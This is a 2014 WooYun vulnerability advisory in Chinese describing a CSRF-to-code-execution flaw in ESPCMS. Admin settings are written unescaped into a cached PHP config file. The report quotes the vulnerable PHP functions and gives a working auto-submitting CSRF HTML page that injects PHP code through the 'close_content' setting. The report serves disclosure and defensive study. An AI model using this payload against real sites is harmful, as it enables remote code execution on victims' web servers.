当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075808

漏洞标题:espcms最新版本CSRF直接getshell

相关厂商:易思ESPCMS企业网站管理系统

漏洞作者: menmen519

提交时间:2014-09-11 16:08

修复时间:2014-12-10 16:10

公开时间:2014-12-10 16:10

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-11: 细节已通知厂商并且等待厂商处理中
2014-09-11: 厂商已经确认,细节仅向厂商公开
2014-09-14: 细节向第三方安全合作伙伴开放
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

简要描述:

espcms 最新版本csrf 直接getshell

详细说明:

这里我们首先看看,存在的代码问题
management.php:(lines:711-741):

function onsetsave() {
		$db_table = db_prefix . 'config';
		$commandfile = admin_ROOT . 'datacache/command.php';
		if (!$this->fun->filemode($commandfile)) {
			exit('false');
		}
		$old_ishtml = $this->CON['is_html'];
		$sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid';
		$rs = $this->db->query($sql);
		while ($rsList = $this->db->fetch_assoc($rs)) {
			if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) {
				continue;
			}
			if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) {
				continue;
			}
			if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) {
				continue;
			}
			$db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'";
			$db_where = 'id=' . $rsList['id'];
			$this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
		}
		$this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'");
		$this->systemfile(true);


看到这个函数我们跟进去看看$this->systemfile(true):
class_connector.php:(lines:514-543):

function systemfile($trueclass = false) {
		$commandfile = admin_ROOT . 'datacache/command.php';
		$varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`";
		if (!is_file($commandfile) || $trueclass) {
			$sConfig = "<?php\n";
			$sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n";
			$sConfig = $sConfig . "// ECISP.CN \n";
			$sConfig = $sConfig . "\$CONFIG=Array(\n";
			$db_table = db_prefix . 'config';
			$sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid";
			$rs = $this->db->query($sql);
			while ($rsList = $this->db->fetch_assoc($rs)) {
				$valname = $rsList['valname'];
				$value = $rsList['value'];
				$valtype = $rsList['valtype'];
				$content = $rsList['content'];
				if ($valtype == 'int' || $valtype == 'bool') {
					$value = empty($value) ? 0 : $value;
					$sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . ",\n";
				} else {
					$sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n";
				}
			}
			$sConfig = $sConfig . ")\n";
			$sConfig = $sConfig . '?' . '>';
			if (!$this->fun->filewrite($commandfile, $sConfig)) {
				exit('System File Error!');
			}
		}
		include $commandfile;


这里我们看明白了已经,这里从数据库里面原封不动的取出来,然后写进缓存配置文件的,那我们举例子分析一下
如果我们配置的是sss' 那么gpc就会给我们转义为sss\' 存储到数据库,但是我们二次取出来的时候就变成了sss'所以这里我们写配置文件的时候特殊字符等于没有做任何处理。
直接看我操作:

15.png


我们去访问一下这个command.php,看看效果:

16.png


完美执行..........

<html>
  <body>
    <script>
	   function csrf_shell(){
			var xhr = new XMLHttpRequest();
			xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALL/upload/adminsoft/index.php?archive=management&action=setsave", true);
			xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
			xhr.withCredentials = "true";
			var body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61efe069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10';
			var aBody = new Uint8Array(body.length);
			for (var i = 0; i < aBody.length; i++)
			  aBody[i] = body.charCodeAt(i);
			xhr.send(new Blob([aBody]));
	   }
	   csrf_shell();
    </script>
  </body>
</html>


完了

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-09-11 19:30

厂商回复:

感谢您对此漏洞的提供。

最新状态:

暂无